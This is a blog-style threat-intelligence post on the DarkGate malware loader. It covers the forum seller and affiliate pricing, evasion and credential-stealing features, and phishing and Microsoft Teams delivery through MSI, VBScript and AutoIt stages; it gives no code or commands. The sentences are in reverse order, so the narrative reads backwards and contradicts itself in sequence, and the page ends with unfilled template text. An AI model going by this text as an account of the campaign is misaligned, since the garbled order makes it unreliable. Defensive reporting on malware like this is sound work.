![]() The actor offers various pricing models for the malware and limits its access to a maximum of 10 affiliates to maintain its exclusivity. This individual claims to have invested over 20,000 hours since 2017 in the malware's development. The Actor Behind DarkGateĪ user named RastaFarEye has been promoting DarkGate Loader on cybercrime forums since June 16, 2023. Additionally, it can steal data from various programs, ranging from web browsers to software like Discord and FileZilla. It can detect and evade common sandbox and virtual machine (VM) solutions, check for well-known Antivirus products, and even masquerade its presence by injecting itself into legitimate Windows processes. The malware is equipped with various features, including persistence mechanisms, privilege escalation, defense evasion techniques, and credential access. This script, after several obfuscation layers, uses the curl binary in Windows to download the AutoIt executable and script file from an attacker-controlled server. In another observed campaign, the initial payload was delivered as a Visual Basic script. Opening the downloaded MSI file initiates the DarkGate infection. Clicking on this link, which likely points to a traffic distribution system (TDS), leads the victim to the final payload URL for an MSI download. Victims receive a phishing message containing a link. The malware uses AutoIt scripts for its initial infection routine and communicates with a C2 protocol similar to previous versions of DarkGate. ![]() However, further examination confirmed its association with the DarkGate malware family. Telekom Security CTI's analysis reveals that the malware campaign was initially misattributed to Emotet due to a false positive match. Once the document is opened, it triggers the download of the DarkGate malware. As reported by TrueSec, the attackers are using fake meeting notifications to lure users into downloading a malicious document. ![]() A recent phishing campaign has been discovered exploiting Microsoft Teams to distribute the DarkGate malware.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |